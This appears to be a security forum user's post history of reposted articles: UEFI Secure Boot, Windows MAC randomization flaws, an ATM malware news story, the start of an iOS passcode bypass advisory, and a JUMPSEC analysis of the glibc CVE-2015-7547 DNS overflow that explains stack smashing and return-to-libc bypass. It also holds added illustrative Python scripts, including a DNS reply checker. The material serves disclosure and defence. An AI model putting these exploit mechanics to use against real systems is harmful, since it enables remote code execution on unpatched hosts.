Nytro

Everything posted by Nytro

  1. We are looking for Junior Pentester(s). If anyone is interested, I'm waiting for a PM. Requirements: - Passion.
  2. The fingerprint sensor on phones can be fooled with a sheet of paper

     Locking your personal smartphone with a biometric sensor is one of the most secure protection methods for such devices. Many have tried to break this protection using various costly methods, but until now printing the fingerprint on a sheet of paper has not had much success. It seems the idea was good, but the equipment was not capable enough to produce a fake fingerprint. The solution? A printer that leaves conductive ink on the paper. Full article and video: http://www.go4it.ro/telefoane-mobile/senzorul-de-amprenta-de-pe-telefoane-poate-fi-pacalit-cu-o-foaie-de-hartie-15100336/
  3. Announcing SQL Server on Linux

     Posted March 7, 2016
     By Scott Guthrie - Executive Vice President, Cloud and Enterprise Group, Microsoft

     It’s been an incredible year for the data business at Microsoft and an incredible year for data across the industry. This Thursday at our Data Driven event in New York, we will kick off a wave of launch activities for SQL Server 2016 with general availability later this year. This is the most significant release of SQL Server that we have ever done, and brings with it some fantastic new capabilities. SQL Server 2016 delivers:

     - Groundbreaking security encryption capabilities that enable data to always be encrypted at rest, in motion and in-memory to deliver maximum security protection
     - In-memory database support for every workload with performance increases up to 30-100x
     - Incredible Data Warehousing performance with the #1, #2 and #3 TPC-H 10 Terabyte benchmarks for non-clustered performance, and the #1 SAP SD Two-Tier performance benchmark on Windows
     - Business Intelligence for every employee on every device – including new mobile BI support for iOS, Android and Windows Phone devices
     - Advanced analytics using our new R support that enables customers to do real-time predictive analytics on both operational and analytic data
     - Unique cloud capabilities that enable customers to deploy hybrid architectures that partition data workloads across on-premises and cloud based systems to save costs and increase agility

     These improvements, and many more, are all built into SQL Server and bring you not just a new database but a complete platform for data management, business analytics and intelligent apps – one that can be used in a consistent way across both on-premises and the cloud.

     In fact, over the last year we’ve been using the SQL Server 2016 code-base to run in production more than 1.4 million SQL Databases in the cloud using our Azure SQL Database as a Service offering, and this real-world experience has made SQL Server 2016 an incredibly robust and battle-hardened data platform. Gartner recently named Microsoft as leading the industry in their Magic Quadrant for Operational Database Management Systems in both execution and vision. We’re also a leader in Gartner’s Magic Quadrant for Data Warehouse and Data Management Solutions for Analytics, and Magic Quadrant for Business Intelligence and Analytics Platforms, as well as leading in vision in the Magic Quadrant for Advanced Analytics Platforms.

     Extending SQL Server to Also Now Run on Linux

     Today I’m excited to announce our plans to bring SQL Server to Linux as well. This will enable SQL Server to deliver a consistent data platform across Windows Server and Linux, as well as on-premises and cloud. We are bringing the core relational database capabilities to preview today, and are targeting availability in mid-2017. SQL Server on Linux will provide customers with even more flexibility in their data solution. One with mission-critical performance, industry-leading TCO, best-in-class security, and hybrid cloud innovations – like Stretch Database which lets customers access their data on-premises and in the cloud whenever they want at low cost – all built in.

     “This is an enormously important decision for Microsoft, allowing it to offer its well-known and trusted database to an expanded set of customers”, said Al Gillen, group vice president, enterprise infrastructure, at IDC. “By taking this key product to Linux Microsoft is proving its commitment to being a cross platform solution provider. This gives customers choice and reduces the concerns for lock-in. We would expect this will also accelerate the overall adoption of SQL Server.”

     “SQL Server’s proven enterprise experience and capabilities offer a valuable asset to enterprise Linux customers around the world,” said Paul Cormier, President, Products and Technologies, Red Hat. “We believe our customers will welcome this news and are happy to see Microsoft further increasing its investment in Linux. As we build upon our deep hybrid cloud partnership, spanning not only Linux, but also middleware, and PaaS, we’re excited to now extend that collaboration to SQL Server on Red Hat Enterprise Linux, bringing enterprise customers increased database choice.”

     “We are delighted to be working with Microsoft as it brings SQL Server to Linux,” said Mark Shuttleworth, founder of Canonical. “Customers are already taking advantage of Azure Data Lake services on Ubuntu, and now developers will be able to build modern applications that utilize SQL Server’s enterprise capabilities.”

     Bringing SQL Server to Linux is another way we are making our products and new innovations more accessible to a broader set of users and meeting them where they are. Just last week, we announced our agreement to acquire Xamarin. Recently, we also announced Microsoft R Server, our technologies based on our acquisition of Revolution Analytics, with support for Hadoop and Teradata.

     The private preview of SQL Server on Linux is available starting today and we look forward to working with the community, our customers and our partners to bring it to market. Please join me, Satya Nadella, Joseph Sirosh and Judson Althoff at our Data Driven event on Thursday to hear more about this news and how Microsoft is helping customers transform their business using data.

     Thanks, Scott

     Source: https://blogs.microsoft.com/blog/2016/03/07/announcing-sql-server-on-linux/
  4. Exploiting Adobe Flash Player In The Era Of Control Flow Guard
  5. AN INTRODUCTION OF UEFI SECURE BOOT AND DISK PARTITIONS IN WINDOWS 10

     As a firmware interface standard to replace BIOS (Basic Input/Output System), the UEFI (Unified Extensible Firmware Interface) specification has been a collective effort by UEFI Forum members for a while. UEFI is in essence an abstraction layer between firmware and OS, independent of device hardware and architecture, which provides flexibility for supporting multiple and various OS environments and also acts as a generic target boot environment of drivers for cross-platform compatibility, as opposed to the need to develop a particular driver for particular hardware. With UEFI, there are also security opportunities to better defend against a class of malware like bootkits and rootkits targeting the pre-boot environment of a device.

     Why UEFI Secure Boot

     Specifically, UEFI Secure Boot is an option to prevent a device from being tampered with in the pre-boot environment, i.e. the period from power-on to initializing the OS. Malware that injects itself into firmware or ROM, gains hardware access, is loaded before the OS, etc., is difficult to defend against or clean up once a device is compromised. The Secure Boot option performs signature authentication upon executing code during pre-boot. A code/firmware creator is in this case required to digitally sign one’s code with a private key, to be verified against the paired public key upon loading at device startup. Apparently, this process demands a signature database of supported hardware vendors established beforehand, which explains why Microsoft, in fact since Windows 8, has instituted a driver signing process for certifying digital signatures of firmware for implementing UEFI Secure Boot, and there are some changes to the process in Windows 10. Above all, the UEFI Secure Boot specification addresses security issues relevant to boot time exploits and eliminates the possibility of executing untrusted or altered code during pre-boot.

     Windows 10 Enterprise supports UEFI 2.3.1 and later for Device Guard, a new and key security feature of Windows 10 Enterprise to ensure hardware and OS boot integrity of corporate devices. The following compares the security features of Windows 10 editions. Additional information comparing Windows 10 editions based on Core Experience and Business Experience is readily available.

     Sample Disk Layouts

     One easy way for an end user to verify if a device is UEFI-based is to examine the disk layout. Typically a BIOS-based device has two partitions, system and OS, on the primary disk where the OS is installed. A device based on UEFI has a vividly different disk layout from that of BIOS, as detailed below. The following are sample disk layouts of Windows 10 devices based on BIOS and UEFI as reported by Disk Manager and the DISKPART command line utility.

     Then BIOS

     This is a sample BIOS setup screen of a Windows device. And this is a typical disk layout of a device with BIOS, with a System and an OS partition, as reported by Windows desktop Disk Manager. A DISKPART session as demonstrated below shows a disk layout consistent with what is reported by Disk Manager, with two partitions accordingly.

     Now with UEFI

     For UEFI, the following are two sample disk layouts. Notice that either one has an EFI System Partition, i.e. ESP. However, a DISKPART session reveals that there is actually an extra partition, the so-called Microsoft Reserved Partition, or MSR, which is:
     - With no partition ID and not reported by Disk Manager
     - Not for storing any user data
     - Reserved for drive management of the local hard disk

     The sizes of ESP and MSR are customizable. And based on business needs, additional partitions are to be added. Those involved in OS imaging and enterprise device deployment are encouraged to review and get familiar with the specifics of and Microsoft’s recommendations on configuring UEFI/GPT-based hard drive partitions, as detailed elsewhere.

     Sample 1, A Typical Disk Layout with UEFI

     This is based on a Surface Pro 4 machine purchased from a retail store running Windows 10 Pro Build 10586, as shown. Disk Manager shows a three-partition disk with an ESP of 100 MB in size. On the same device, a DISKPART session reveals that the disk also has a 16-MB MSR as Partition 3.

     Sample 2, A Custom Disk Layout with UEFI

     Below is a sample company-issued Surface Pro 3 device running Windows 10 Enterprise Insider Preview Build 11082. Here, Disk Manager presents a custom image with four partitions including a 350 MB ESP and a recovery partition after the OS partition. And again, a DISKPART session reveals a 128 MB MSR as Partition 3.

     UEFI and GPT

     One thing worth pointing out is that when deploying Windows to a UEFI-based PC, one must format the hard drive that includes the Windows partition as a GUID Partition Table (GPT) file system. Additional drives may then use either the GPT or Master Boot Record (MBR) file format.

     Manually Enabling Secure Boot

     With UEFI already configured, here are manual ways to enable/configure Secure Boot on a Windows 10 device.

     A Hardware Short-Cut with Surface Pro devices

     There is a convenient way via hardware to change the boot settings of a Microsoft Surface Pro device. While the machine is powered off, pressing the power button and the volume up button at the same time for a few (generally 5 to 10, some may take 20 or more) seconds will bring up the device boot setting screen. And if one keeps holding the power and volume up buttons past the boot setup screen for another few seconds, eventually this will trigger reloading the firmware in my experience. Here is the boot setup screen from the above mentioned Surface Pro 4 device running Windows 10 Pro, purchased from a retail store, and with the secure boot options: On the other hand, the following is a boot setup screen from a sample company-issued Surface Pro 3 device with a custom image built and deployed with System Center Configuration Manager. The UI may appear different, and the available settings are mostly the same.

     Changing UEFI or Boot Settings via UI

     For a Windows 10 device based on UEFI, here is a visual presentation demonstrating how to manually enable UEFI Secure Boot on a Surface Pro 3 device running Windows 10 Enterprise Insider Preview Build 11082. The process begins by clicking Start/Settings from the desktop. Upon the first restart, click the following screens as indicated. And the second restart should bring up the boot setup screen shown earlier in this article. And again as mentioned, the process via UI can be short-cut by pressing the power and the volume up button at the same time for a few seconds, while a Surface Pro device is powered off.

     Closing Thoughts

     With on-going malware threats and a growing trend in adopting BYOD, IT must recognize the urgency to fundamentally secure corporate devices from power on to off. UEFI Secure Boot is an industry standard and a mechanism to ensure hardware integrity every time and all the time. There are specific hardware requirements and configurations that must first be put in place for solutions relying on UEFI Secure Boot like Device Guard for Windows 10 Enterprise. Therefore, rolling out UEFI 2.3.1 or later and TPM 2.0 as well are important hardware components for IT to leverage hardware-based security features to fundamentally secure corporate devices.

     Source: https://yungchou.wordpress.com/2016/03/04/an-introduction-of-uefi-secure-boot-in-windows-10-enterprise/
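The GPT layout the post inspects with Disk Manager and DISKPART can also be read straight from the partition table. The following Python script is an added example, not code from the post or from Microsoft: it builds a constructed GPT header and entry array modelled on the post's Sample 1 (100 MB ESP, 16 MB MSR), parses it back with both CRC32 checks, and identifies the ESP and MSR by their published type GUIDs. The Windows and recovery partition sizes, the 8 GiB disk and the `disk_manager_view` helper are assumptions used to mirror the Disk Manager versus DISKPART difference the post describes.

```python
import struct
import uuid
import zlib

# Published GPT partition type GUIDs used in Windows layouts (real values).
GPT_TYPES = {
    uuid.UUID("c12a7328-f81f-11d2-ba4b-00a0c93ec93b"): "EFI System Partition (ESP)",
    uuid.UUID("e3c9e316-0b5c-4db8-817d-f92df00215ae"): "Microsoft Reserved Partition (MSR)",
    uuid.UUID("ebd0a0a2-b4bf-11d2-a07a-c8e7d0abf29b"): "Basic data partition",
    uuid.UUID("de94bba4-06d1-4d40-a16a-bfd50179d6ac"): "Windows Recovery partition",
}
SECTOR, MIB = 512, 1024 * 1024
HEADER_FMT = "<8sIIIIQQQQ16sQIII"   # the 92-byte GPT header stored at LBA 1
NUM_ENTRIES, ENTRY_SIZE = 128, 128  # standard 16 KiB partition entry array


def build_entry(type_guid, first_lba, last_lba, name, idx):
    # GUIDs are stored on disk in mixed-endian form, hence bytes_le.
    unique = uuid.UUID(int=idx).bytes_le   # constructed, deterministic unique GUID
    name_utf16 = name.encode("utf-16-le").ljust(72, b"\x00")[:72]
    return type_guid.bytes_le + unique + struct.pack("<QQQ", first_lba, last_lba, 0) + name_utf16


def build_gpt(partitions, disk_sectors):
    """Return (header, entry_array) for a constructed disk; partitions is a list of
    (type_guid, size_bytes, name) laid out back to back starting at 1 MiB."""
    entries, next_lba = b"", MIB // SECTOR
    for idx, (type_guid, size, name) in enumerate(partitions, start=1):
        last_lba = next_lba + size // SECTOR - 1
        entries += build_entry(type_guid, next_lba, last_lba, name, idx)
        next_lba = last_lba + 1
    entries = entries.ljust(NUM_ENTRIES * ENTRY_SIZE, b"\x00")
    fields = [b"EFI PART", 0x00010000, 92, 0, 0, 1, disk_sectors - 1, 34,
              disk_sectors - 34, uuid.UUID(int=0xD15C).bytes_le, 2,
              NUM_ENTRIES, ENTRY_SIZE, zlib.crc32(entries) & 0xFFFFFFFF]
    fields[3] = zlib.crc32(struct.pack(HEADER_FMT, *fields)) & 0xFFFFFFFF  # header CRC
    return struct.pack(HEADER_FMT, *fields), entries


def parse_gpt(header, entries):
    """Parse the LBA 1 header and entry array, verifying both CRC32s, and list every
    partition, including the MSR that Disk Manager hides but DISKPART shows."""
    f = struct.unpack(HEADER_FMT, header[:92])
    if f[0] != b"EFI PART":
        raise ValueError("not a GPT header")
    if zlib.crc32(header[:16] + b"\x00" * 4 + header[20:92]) & 0xFFFFFFFF != f[3]:
        raise ValueError("header CRC32 mismatch")
    n_ent, ent_size, ent_crc = f[11], f[12], f[13]
    if zlib.crc32(entries[:n_ent * ent_size]) & 0xFFFFFFFF != ent_crc:
        raise ValueError("entry array CRC32 mismatch")
    parts = []
    for i in range(n_ent):
        raw = entries[i * ent_size:(i + 1) * ent_size]
        type_guid = uuid.UUID(bytes_le=raw[:16])
        if type_guid.int == 0:
            continue   # unused slot
        first, last = struct.unpack("<QQ", raw[32:48])
        parts.append({
            "partition": len(parts) + 1,
            "type": GPT_TYPES.get(type_guid, str(type_guid)),
            "size_mib": (last - first + 1) * SECTOR // MIB,
            "name": raw[56:128].decode("utf-16-le").rstrip("\x00"),
        })
    return parts


def disk_manager_view(parts):
    # Disk Manager omits the MSR; DISKPART lists it (the post's observation).
    return [p for p in parts if "MSR" not in p["type"]]


# Constructed layout modelled on the post's Sample 1 (100 MB ESP, 16 MB MSR);
# the Windows and recovery partition sizes are assumptions for illustration.
SAMPLE_LAYOUT = [
    (uuid.UUID("c12a7328-f81f-11d2-ba4b-00a0c93ec93b"), 100 * MIB, "EFI system partition"),
    (uuid.UUID("e3c9e316-0b5c-4db8-817d-f92df00215ae"), 16 * MIB, "Microsoft reserved partition"),
    (uuid.UUID("ebd0a0a2-b4bf-11d2-a07a-c8e7d0abf29b"), 4096 * MIB, "Basic data partition"),
    (uuid.UUID("de94bba4-06d1-4d40-a16a-bfd50179d6ac"), 450 * MIB, "Basic data partition"),
]
SAMPLE_DISK_SECTORS = 8 * 1024 * MIB // SECTOR   # an 8 GiB constructed disk


def sample_partitions():
    header, entries = build_gpt(SAMPLE_LAYOUT, SAMPLE_DISK_SECTORS)
    return parse_gpt(header, entries)


if __name__ == "__main__":
    parts = sample_partitions()
    for p in parts:   # DISKPART-style listing, MSR included
        print(f"Partition {p['partition']}: {p['size_mib']:>5} MB  {p['type']}")
    print("Disk Manager shows", len(disk_manager_view(parts)), "of", len(parts), "partitions")
```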
  6. How MAC Address Randomization Works on Windows 10

     When Apple announced its devices would use random MAC addresses when searching for Wi-Fi networks, it received extensive media attention. And rightly so. It prevents companies from tracking your movements, and Apple was the first major player to start doing this. Windows and Android are quietly trying to catch up. As a result, some devices running Windows now support MAC address randomization, and we will discuss how it's implemented, and where it fails. This information is a small selection from the recent paper Why MAC Address Randomization is not Enough: An Analysis of Wi-Fi Network Discovery Mechanisms.

     How it works

     Microsoft first added support for MAC address randomization in Windows 10. Unfortunately, it's only available if you have a WiFi card and driver that support it. For example, the Intel 7265 AC, when using the latest driver, supports randomization [1]. You can see if your hardware supports MAC address randomization by going through the following menus: If your hardware supports MAC address randomization, you will see the following option at the top of the window: As you can see, I have it enabled on my laptop. So far it's been working quite well.

     What's very interesting about Microsoft's approach is that it also uses random MAC addresses when connecting to a wireless network. In contrast, Apple only uses random addresses when searching for nearby networks, and it falls back to its original address when connecting to a network. In this aspect Windows 10 offers better privacy than Apple. Using a random MAC address to connect to a network can cause problems if users are authenticated (i.e., recognized) based on their MAC address [2]. Interestingly, Windows avoids this issue by always using the same random address every time it connects to a specific network. For example, let's say you want to pay for Wi-Fi access, and they authenticate you based on your MAC address. Then this is not a problem. The first time you connect, Windows will generate a random MAC address. And if you reconnect to this network at a later point in time, Windows will reuse the previously generated address. Therefore the system can still recognize you, and you don't have to pay twice. There's one downside to this approach: since you always use the same address when connecting to a particular network, an adversary can learn when certain devices connect to specific networks. Nevertheless, compared to the old situation where you'd always use the original MAC address, it improves your privacy.

     Technically, the random MAC address that is used to connect to a network is calculated as [5]:

     address = SHA-256(SSID, real MAC address, connectionId, secret)[:6]

     Here SSID is the name of the network you are connecting to, real MAC address the original address of your network interface, and connectionId is a value that changes every time the user removes (and re-adds) the network (i.e., this value is updated if you "forget" the network under Windows 10). The secret parameter is a 256-bit cryptographic random number, generated during system initialization, and kept the same across reboots. Every interface has a different value of the secret parameter, to assure each interface gets a different random MAC address. Finally, bits in the most significant byte of address are set so it becomes a locally administered, unicast address. While the presentation by Huitema partly described this process, our paper is the first to describe this formula in full detail.

     It's also possible to disable randomization for certain networks. In this case Windows will use the original address when connecting to a network. You can configure this through the following settings when you are currently connected to the network: Notice that the user has three options for each specific network:
     - On: the same random MAC address is always used when connecting to this network.
     - Off: the original MAC address is used.
     - Change daily: every day a new random MAC address is used.

     Remark that if randomization is enabled, independent of the above options, Windows 10 will always use random MAC addresses when scanning for nearby networks. This "scanning" address changes every time you connect (and disconnect) from a network, and when you restart your device [3]. Hence it doesn't change that frequently, but it's still sufficient to prevent tracking over extended periods of time. In contrast, Apple changes the scanning address roughly every few minutes, which provides more privacy.

     Basic Security Analysis

     Randomization as implemented in Windows 10 significantly improves your privacy. So enable it! Unfortunately, it's not perfect, because there are still some ways to defeat or bypass it.

     The first weakness is that the sequence number contained in WiFi frames is not reset when changing the (random) MAC address. This sequence number, which is present in most Wi-Fi frames, is used to detect retransmissions, and is incremented by one after successfully transmitting a frame. As shown in the picture below, when the MAC address changes because the user connects to a network, the sequence counter is not reset: The last frame from ea:69:0a:* has the sequence number 92, and the other address 7c:5c:f8:* has the sequence number 94. Based on this an adversary can reasonably conclude that both frames are sent by the same device. In other words, he learns that the same device was using both addresses, defeating the purpose of address randomization.

     The second problem is that Windows 10 reveals its real MAC address when interacting with Hotspot 2.0 networks. But what's Hotspot 2.0? Simply put, Hotspot 2.0 is a new standard to automatically and securely roam between WiFi networks. No manual interaction is needed. Your device automatically determines whether you have the appropriate credentials (passwords) to connect to a network. Think of this like the cellular network: when you get off the plane, your phone automatically finds and connects to a foreign cellular network. Hotspot 2.0 provides a similar experience for WiFi. In order to accomplish automatic roaming, Hotspot 2.0 sends ANQP queries to the Access Point before connecting to it. These ANQP queries request detailed information about the wireless network. This information includes the credentials that are needed to connect with the hotspot, whether the hotspot provides internet access or only local network access, etc. Unfortunately, Windows 10 sends these ANQP queries using the real (original) MAC address: In the first probe request it uses the random MAC address 2a:b3:e6:*. These probe requests are used to detect the presence of networks. If there's a Hotspot 2.0 network nearby, Windows will send ANQP requests using the real MAC address, in this case 7c:5c:f8:*. Therefore an attacker can obtain your real MAC address by advertising a Hotspot 2.0 network. Thankfully, Windows 10 only sends ANQP queries if at least one Hotspot 2.0 is configured. Since this standard is not yet widely deployed, few users will have such a network configured [4].

     Detailed Security Analysis

     Want to know all flaws that are present in existing implementations of MAC address randomization? And this specifically for Android, Apple, Linux, and Windows? Then read my paper Why MAC Address Randomization is not Enough: An Analysis of Wi-Fi Network Discovery Mechanisms [5]! It has everything explained in technical detail.

     References and Footnotes

     [1] If you have an Intel 7260 AC, you can also force Windows 10 to use the drivers of the Intel 7265 AC. Your device will still work, and will support MAC address randomization.
     [2] Even though authentication based on the MAC address is utterly insecure (an adversary can easily spoof a MAC address), it's still used by many systems.
     [3] C. Huitema. Personal communication, Nov. 2015.
     [4] One notable exception is the Passpoint configuration provided by Boingo. Essentially Passpoint is a synonym of Hotspot 2.0. If you have this configuration installed, you have a Hotspot 2.0 capable device, and the Boingo configuration will use Hotspot 2.0. This means Windows will send ANQP queries to nearby Hotspot 2.0 networks.
     [5] M. Vanhoef, C. Matte, M. Cunche, L. S. Cardoso, and F. Piessens. Why MAC Address Randomization is not Enough: An Analysis of Wi-Fi Network Discovery Mechanisms (AsiaCCS 2016).

     Posted by Mathy at 20:21
     Source: http://www.mathyvanhoef.com/2016/03/how-mac-address-randomization-works-on.html
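The per-network address formula in the post above, worked through in Python as an added example (not code from the post, the paper or Windows): SHA-256 over SSID, real MAC, connectionId and the per-interface secret, truncated to 6 bytes, with the first byte forced to locally administered unicast. The exact field encoding (UTF-8 SSID, 4-byte little-endian connectionId, no separators) and all sample values are assumptions of this example; the `demo` function checks the properties the post describes: the address is stable on reconnect, changes after the network is forgotten, and differs per interface.

```python
import hashlib

# Constructed sample values (not real device data).
REAL_MAC = bytes.fromhex("7c5cf8000001")   # 6-byte hardware address
SECRET_A = bytes(range(32))                # per-interface 256-bit secret, interface A
SECRET_B = bytes(reversed(range(32)))      # a second interface's secret


def random_mac_for_network(ssid, real_mac, connection_id, secret):
    """Derive the stable per-network random address as the post describes:
    SHA-256 over (SSID, real MAC, connectionId, secret), truncated to 6 bytes, with
    the first byte adjusted to a locally administered unicast address.
    The field encoding (UTF-8 SSID, 4-byte little-endian connectionId, no
    separators) is an assumption of this example, not Windows' exact layout."""
    if len(real_mac) != 6 or len(secret) != 32:
        raise ValueError("real_mac must be 6 bytes and secret 32 bytes")
    h = hashlib.sha256()
    h.update(ssid.encode("utf-8"))
    h.update(real_mac)
    h.update(connection_id.to_bytes(4, "little"))
    h.update(secret)
    addr = bytearray(h.digest()[:6])
    addr[0] = (addr[0] | 0x02) & 0xFE   # set the U/L bit, clear the I/G (multicast) bit
    return bytes(addr)


def fmt_mac(addr):
    return ":".join(f"{b:02x}" for b in addr)


def is_locally_administered_unicast(addr):
    return (addr[0] & 0x03) == 0x02


def demo(ssid="CoffeeShopWiFi"):
    """Show the properties the post describes: stable across reconnects, new after
    the network is forgotten (connectionId changes), different per interface."""
    first = random_mac_for_network(ssid, REAL_MAC, 1, SECRET_A)
    again = random_mac_for_network(ssid, REAL_MAC, 1, SECRET_A)
    after_forget = random_mac_for_network(ssid, REAL_MAC, 2, SECRET_A)
    other_iface = random_mac_for_network(ssid, REAL_MAC, 1, SECRET_B)
    return {
        "stable_on_reconnect": first == again,
        "changes_after_forget": first != after_forget,
        "differs_per_interface": first != other_iface,
        "locally_administered_unicast": is_locally_administered_unicast(first),
        "never_leaks_real_mac": first != REAL_MAC,
        "address": fmt_mac(first),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```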
  7. CVE 2015-7547 glibc getaddrinfo() DNS Vulnerability

     Posted by jstester007 on March 7th, 2016

     Hello w0rld! JUMPSEC researchers have spent some time on the glibc DNS vulnerability indexed as CVE 2015-7547 (It hasn’t got a cool name like GHOST unfortunately…). It appears to be a highly critical vulnerability and covers a large number of systems. It allows remote code execution by a stack-based overflow in the client side DNS resolver. In this post we would like to present our analysis.

     Google POC overview

     Google POC Network Exploitation Timeline

     Google POC Exploit Code Analysis

     First response (code snippet and packet capture snippet)

     The dw() function calls the “struct” module from the python library. According to the documentation, it performs conversion between python values and C structs represented as python strings. In this case, it interprets a python integer and packs it into little-endian short type binary data. This is a valid response sent by the “malicious” DNS server when it receives any initial queries. This response packet is constructed intentionally in large size (with 2500 bytes of null); it forces the client to retry over TCP and allocate an additional memory buffer for the next response. This also triggers the dual DNS query from getaddrinfo() on the client side, which is a single request containing A and AAAA queries concatenated.

     Second Response (code snippet and packet capture snippet)

     This is the second response sent by the malicious DNS server. It is a malformed packet sending large numbers of “fake records” (184 Answer RRs) back to the client. According to google, this forces __libc_res_nsend to retry the query.

     Third response (code snippet and packet capture snippet)

     This is the third response sent by the “malicious” DNS server. It is another malformed packet which is carrying the payload. JUMPSEC researcher has modified the Google POC code to identify the number of bytes to cause a segmentation fault (possibly overwriting the RET address) of the buffer. It is found that the RET address is being overwritten on the 2079th byte. With the addition of the return_to_libc technique, an attacker can bypass OS protection such as NX bit or ASLR and perform remote code execution.

     Google POC debugging and crash analysis

     JUMPSEC has run it through the trusty gdb. It crashes with a SEGMENTATION FAULT which verifies that the DNS response has smashed the stack of the vulnerable client application when running getaddrinfo(). The vulnerable buffer is operated in gaih_getanswer. The entry address has been overwritten with 0x4443424144434241 (ABCDABCD). The state of the registers also shows the overflowed bytes.

     SEGFAULT from vulnerable client. RET address is overwritten with “ABCDABCD”
     Backtrack
     Registers

     JUMPSEC has also tested it on a few other applications. It was found that the getaddrinfo() function in glibc is commonly used…

     Iceweasel crashing

     Conclusion

     The best way to mitigate this issue is to enforce proper patch management. Make sure to update all your systems with the latest version of glibc. If you have any systems exposed on the internet and you want to make sure that this vulnerability is not triggered then the following Wireshark filter could be useful: (DNS.length>2048 to see malformed packets). A DNS response has a maximum of 512 bytes (typically); note that the DNS reply is truncated. Even if the client does not accept a large response, smaller responses can be combined into a large one which can also trigger the vulnerability. A possible filter is to monitor the size of the entire conversation, as a distinct amount of bytes in total is required to trigger specific responses from the vulnerable client and all of them require more than 2048 bytes. The above vulnerability can be fixed by patching. If you are running RedHat or CentOS a simple yum -y update glibc will update the libc and resolve the issue.

     Reference links
     https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7547
     http://pubs.opengroup.org/onlinepubs/9699919799/functions/freeaddrinfo.html
     https://googleonlinesecurity.blogspot.co.uk/2016/02/cve-2015-7547-glibc-getaddrinfo-stack.html
     https://sourceware.org/ml/libc-alpha/2016-02/msg00416.html

     Source: https://labs.jumpsec.com/2016/03/07/cve-2015-7547-glibc-getaddrinfo-dns-vulnerability/
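The monitoring idea in the conclusion above (flag DNS replies over 2048 bytes and watch the total size of a DNS-over-TCP conversation), as an added example in Python that is not JUMPSEC's or Google's code. It walks the length-prefixed messages of a TCP stream, reports replies over 2048 bytes and replies with an implausible answer count, and sums the conversation; the sample streams are constructed (zero padding and repeated ordinary A records only, no exploit content) and the 64-answer threshold is an assumption, chosen well below the 184 RRs the post mentions.

```python
import struct

DNS_HEADER = struct.Struct("!HHHHHH")   # id, flags, qdcount, ancount, nscount, arcount
MAX_SANE_LENGTH = 2048   # the post's Wireshark threshold for malformed responses
MAX_SANE_ANSWERS = 64    # assumed threshold; the POC's second reply carried 184 answer RRs


def build_response(txid, ancount=1, padding=0, flags=0x8180):
    """Constructed DNS response for 'example.test A': one question, `ancount`
    16-byte A records (name compressed as a pointer to the question), then
    `padding` zero bytes. Used only to produce sample traffic for the checker."""
    question = b"\x07example\x04test\x00" + struct.pack("!HH", 1, 1)
    rr = struct.pack("!HHHIH", 0xC00C, 1, 1, 60, 4) + bytes([192, 0, 2, 1])
    return DNS_HEADER.pack(txid, flags, 1, ancount, 0, 0) + question + rr * ancount + b"\x00" * padding


def tcp_frame(msg):
    # DNS over TCP prefixes each message with a 2-byte big-endian length.
    return struct.pack("!H", len(msg)) + msg


def inspect_tcp_stream(data):
    """Walk the length-prefixed messages of a DNS-over-TCP stream and report the
    signals the post suggests watching: individual replies over 2048 bytes,
    implausible answer counts, and the total bytes sent in the conversation."""
    findings, offset, count, total = [], 0, 0, 0
    while offset + 2 <= len(data):
        (length,) = struct.unpack("!H", data[offset:offset + 2])
        msg = data[offset + 2:offset + 2 + length]
        count += 1
        if len(msg) < length:
            findings.append({"message": count, "issue": "truncated message"})
            break
        total += length
        if len(msg) < DNS_HEADER.size:
            findings.append({"message": count, "issue": "shorter than a DNS header"})
        else:
            _txid, _flags, _qd, ancount, _ns, _ar = DNS_HEADER.unpack(msg[:DNS_HEADER.size])
            if length > MAX_SANE_LENGTH:
                findings.append({"message": count,
                                 "issue": f"response of {length} bytes exceeds {MAX_SANE_LENGTH}"})
            if ancount > MAX_SANE_ANSWERS:
                findings.append({"message": count, "issue": f"{ancount} answer RRs in one response"})
        offset += 2 + length
    return {"messages": count, "total_bytes": total,
            "conversation_over_2048": total > MAX_SANE_LENGTH, "findings": findings}


# Constructed streams: a benign one and one shaped like the POC's oversized and
# answer-heavy replies (zero padding only; no exploit content).
BENIGN_STREAM = tcp_frame(build_response(0x1111)) + tcp_frame(build_response(0x2222))
SUSPICIOUS_STREAM = (tcp_frame(build_response(0x1111))
                     + tcp_frame(build_response(0x2222, padding=2500))
                     + tcp_frame(build_response(0x3333, ancount=184)))


if __name__ == "__main__":
    for label, stream in (("benign", BENIGN_STREAM), ("suspicious", SUSPICIOUS_STREAM)):
        report = inspect_tcp_stream(stream)
        print(label, report["total_bytes"], "bytes;", len(report["findings"]), "finding(s)")
        for finding in report["findings"]:
            print("  message", finding["message"], "-", finding["issue"])
```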
  8. Climber

     Automated auditing tool to check UNIX/Linux systems misconfigurations which may allow local privilege escalation.

     Dependencies
     - python >= 2.7
     - python-crypto
     - python-mako
     - python-paramiko

     Note
     Climber needs Exscript, a Python module and a template processor for automating network connections over protocols such as Telnet or SSH. https://github.com/knipknap/exscript This module is already included in Climber sources.

     License
     This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version.

     Source: https://github.com/raffaele-forte/climber
  9. Romanian ATM hacker exploits vulnerability in FENCE, escapes jail

     Robber clobbered but catching carder is harder

     8 Mar 2016 at 05:56, Darren Pauli

     A Romanian carder arrested for using malware to plunder US$217,000 (£152,164, A$290,888) from ATMs has cut their way out of a Bucharest prison and escaped custody.

     Renato Marius Tulli, 34, escaped Police Precinct 19 with Grosy Gostel, 38, held for robbery charges, sparking a city-wide hunt, local media report. Gostel has been caught while malware man Tulli remains on the run.

     The carder and the robber cut a hole in the mesh fence and jumped an outer fence at the police station.

     Tulli and his gang raided ATMs maintained by NCR across Romania, Hungary, Spain, Russia, and the Czech Republic. They used the Tyupkin malware, loading it onto ATMs using a CD slotted into the back of the machines. That malware has been upgraded in recent months and is now known as GreenDispenser and is being used to target ATMs across Mexico. There is little preventing the self-deleting malware from being used in other countries, experts say.

     Source: http://www.theregister.co.uk/2016/03/08/romanian_atm_hacker_exploits_vulnerability_in_fence_escapes_jail/
  10. Apple iOS v9.2.1 - Multiple PassCode Bypass Vulnerabilities

      From: Vulnerability Lab <research () vulnerability-lab com>
      Date: Mon, 7 Mar 2016 09:52:02 +0100

      Document Title:
      ===============
      Apple iOS v9.2.1 - Multiple PassCode Bypass Vulnerabilities (App Store Link, Buy Tones Link & Weather Channel Link)

      References (Source):
      ====================
      http://www.vulnerability-lab.com/get_content.php?id=1778
      Video: http://www.vulnerability-lab.com/get_content.php?id=1779

      Release Date:
      =============
